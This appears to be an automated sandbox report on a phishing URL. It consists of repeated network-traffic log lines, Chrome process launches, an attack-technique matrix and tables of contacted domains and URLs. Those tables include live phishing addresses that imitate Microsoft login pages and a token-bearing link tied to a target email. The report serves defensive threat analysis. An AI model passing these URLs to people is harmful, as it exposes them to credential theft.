              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
              Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
              Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
              Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
              Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
              Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
              Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49864 version: TLS 1.2
              Source: classification engineClassification label: mal72.phis.win@19/30@16/6
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1956,i,5367884434613329053,5550688363984249311,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://adrianocarreira.com/team/index.html"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1956,i,5367884434613329053,5550688363984249311,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure1
              Drive-by Compromise
              Windows Management InstrumentationPath Interception1
              Process Injection
              1
              Process Injection
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
              Ingress Tool Transfer
              Traffic DuplicationData Destruction
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              https://adrianocarreira.com/team/index.html0%Avira URL Cloudsafe
              https://adrianocarreira.com/team/index.html100%SlashNextCredential Stealing type: Phishing & Social usering
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://documerger.afua.com.br/aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js0%Avira URL Cloudsafe
              https://documerge.arroiodosilva.com.br/?jjzzxogc&email=u9s7oo@vlxwrxa.org0%Avira URL Cloudsafe
              https://documerger.afua.com.br/favicon.ico0%Avira URL Cloudsafe
              https://adrianocarreira.com/favicon.ico0%Avira URL Cloudsafe
              https://documerger.afua.com.br/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2RvY3VtZXJnZXIuYWZ1YS5jb20uYnIvIiwiZG9tYWluIjoiZG9jdW1lcmdlci5hZnVhLmNvbS5iciIsImtleSI6Imt1SkZ5Q3YyeWt0VCIsInFyYyI6InU5czdvb0B2bHh3cnhhLm9yZyIsImlhdCI6MTczMjcyNzM4OCwiZXhwIjoxNzMyNzI3NTA4fQ.3Glfdu1-h4hcJLG6frjQG7LUrGE0ClWKXeH5CYKR-jk0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              documerge.arroiodosilva.com.br
              94.247.42.112
              truefalse
                unknown
                documerger.afua.com.br
                94.247.42.112
                truetrue
                  unknown
                  sni1gl.wpc.omegacdn.net
                  152.199.21.175
                  truefalse
                    high
                    www.google.com
                    142.250.181.100
                    truefalse
                      high
                      s-part-0035.t-0009.t-msedge.net
                      13.107.246.63
                      truefalse
                        high
                        adrianocarreira.com
                        94.46.167.218
                        truefalse
                          unknown
                          portal.microsoftonline.com
                          unknown
                          unknownfalse
                            high
                            aadcdn.msftauth.net
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://adrianocarreira.com/team/index.htmltrue
                                unknown
                                https://documerger.afua.com.br/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2RvY3VtZXJnZXIuYWZ1YS5jb20uYnIvIiwiZG9tYWluIjoiZG9jdW1lcmdlci5hZnVhLmNvbS5iciIsImtleSI6Imt1SkZ5Q3YyeWt0VCIsInFyYyI6InU5czdvb0B2bHh3cnhhLm9yZyIsImlhdCI6MTczMjcyNzM4OCwiZXhwIjoxNzMyNzI3NTA4fQ.3Glfdu1-h4hcJLG6frjQG7LUrGE0ClWKXeH5CYKR-jkfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://documerger.afua.com.br/aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.jsfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://adrianocarreira.com/favicon.icofalse
                                • Avira URL Cloud: safe
                                unknown
                                https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.orgfalse
                                  unknown
                                  https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=truetrue
                                    unknown
                                    https://documerge.arroiodosilva.com.br/?jjzzxogc&email=u9s7oo@vlxwrxa.orgfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://documerger.afua.com.br/favicon.icofalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://login.microsoftonline.comchromecache_58.3.drfalse
                                      high
                                      http://www.opensource.org/licenses/mit-license.php)chromecache_63.3.dr, chromecache_68.3.dr, chromecache_61.3.dr, chromecache_70.3.drfalse
                                        high
                                        http://knockoutjs.com/chromecache_63.3.dr, chromecache_68.3.dr, chromecache_61.3.dr, chromecache_70.3.drfalse
                                          high
                                          https://github.com/douglascrockford/JSON-jschromecache_63.3.dr, chromecache_70.3.drfalse
                                            high
                                            https://login.windows-ppe.netchromecache_58.3.drfalse
                                              high
